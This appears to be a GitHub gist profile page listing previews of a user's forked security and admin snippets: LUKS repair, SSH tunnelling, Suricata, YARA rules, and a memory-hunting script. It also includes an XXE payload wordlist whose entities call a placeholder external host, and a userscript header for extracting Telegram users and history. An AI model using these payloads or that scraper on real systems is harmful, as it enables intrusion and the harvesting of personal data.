acealchemycyberblaze’s gists

acealchemycyberblaze / repair_boot.md

Created July 27, 2022 15:59 — forked from samuelcolvin/repair_boot.md

repairing boot for LUKS encrypted fs

Guides:

cryptsetup luksOpen /dev/sdb3 home_sdb3
vgchange -ay
lvscan

acealchemycyberblaze / telegramScript.user.js

Created July 1, 2022 22:51 — forked from fabledowl/telegramScript.user.js

	// ==UserScript==
	// @name Telegram Script
	// @author [email protected]
	// @version 0.3
	// @description Greasemonkey script to extract users/history
	// @author You
	// @downloadUrl https://gist.github.com/fabledowl/4d6f84b211a2918fb9ee9556550df5b0/raw/telegramScript.user.js
	// @updateUrl https://gist.github.com/fabledowl/4d6f84b211a2918fb9ee9556550df5b0/raw/telegramScript.user.js
	// @include https://web.telegram.org/*
	// @grant none

acealchemycyberblaze / ssh_tunneling.md

Created March 27, 2022 10:59 — forked from ashrithr/ssh_tunneling.md

ssh tunneling and port forwarding

###Single hop tunelling:

ssh -f -N -L 9906:127.0.0.1:3306 [email protected]

where,

-f puts ssh in background
-N makes it not execute a remote command

acealchemycyberblaze / restartSuricata.sh

Created December 24, 2021 03:41 — forked from Bsebring/restartSuricata.sh

Restart Suricata conveniently in Daemon mode using this bash script

	# Stop parent process (does not fully stop suricata)
	service suricata stop

	# Remove the pid file if it exists
	FILE=/var/run/suricata.pid
	if test -f "$FILE"; then
	rm "$FILE"
	fi

	# Kill suricata by name to eliminate child processes and prevent old configurations from ran$

acealchemycyberblaze / xxe-payloads.txt

Created September 20, 2020 20:21 — forked from honoki/xxe-payloads.txt

XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder

	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

acealchemycyberblaze / keybase.md

Created August 12, 2020 00:09

Keybase.io Proof

Keybase proof

I hereby claim:

I am cyb3rdo on github.
I am cyb3rdo (https://keybase.io/cyb3rdo) on keybase.
I have a public key ASDrlHa2GD5KAtdynNOjMKYXWeTAyHPaOtjjlmMz39pC3go

To claim this, I am signing this object:

acealchemycyberblaze / iddqd.yar

Created July 10, 2020 03:48 — forked from Neo23x0/iddqd.yar

IDDQD - Godmode YARA Rule

	/*
	_____ __ __ ___ __
	/ ___/__ ___/ / / \|/ /__ ___/ /__
	/ (_ / _ \/ _ / / /\|_/ / _ \/ _ / -_)
	\___/\___/\_,_/_/_/__/_/\___/\_,_/\__/
	\ \/ / _ \| / _ \/ _ \| / _ \__ __/ /__
	\ / __ \|/ , _/ __ \| / , _/ // / / -_)
	/_/_/ \|_/_/\|_/_/ \|_\| /_/\|_\|\_,_/_/\__/
	Florian Roth - v0.5.0 October 2019

acealchemycyberblaze / XProtect.yara

Created July 8, 2020 05:20 — forked from pedramamini/XProtect.yara

Apple OSX built in file defense is powered by YARA: /System/Library/CoreServices/XProtect.bundle/Contents/Resources

	import "hash"

	private rule Macho
	{
	meta:
	description = "private rule to match Mach-O binaries"
	condition:
	uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca

	}

acealchemycyberblaze / Get-InjectedThread.ps1

Created March 31, 2020 18:03 — forked from jaredcatkinson/Get-InjectedThread.ps1

Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone

	function Get-InjectedThread
	{
	<#

	.SYNOPSIS

	Looks for threads that were created as a result of code injection.

	.DESCRIPTION

acealchemycyberblaze / url_parser.py

Last active March 19, 2020 19:03 — forked from 33sticks/url_parser.py

A Python script that takes a CSV file containing URLs, say from a web server log or an analytics platform, and parsing the URLs into URL parts that are then appended to a data frame for further manipulation and/or data analysis.

	#import the urlprase library to break url into components
	from urlparse import urlparse

	#import pandas for data processing
	from pandas import DataFrame, Series
	import pandas as pd

	#import URL data
	df = pd.read_csv("/Users/Documents/analysis/my_urls.csv")

	/*
	_____ __ __ ___ __
	/ ___/__ ___/ / / \|/ /__ ___/ /__
	/ (_ / _ \/ _ / / /\|_/ / _ \/ _ / -_)
	\___/\___/\_,_/_/_/__/_/\___/\_,_/\__/
	\ \/ / _ \| / _ \/ _ \| / _ \__ __/ /__
	\ / __ \|/ , _/ __ \| / , _/ // / / -_)
	/_/_/ \|_/_/\|_/_/ \|_\| /_/\|_\|\_,_/_/\__/
	Florian Roth - v0.5.0 October 2019

ACE Alchemy Cyberblaze acealchemycyberblaze

Keybase proof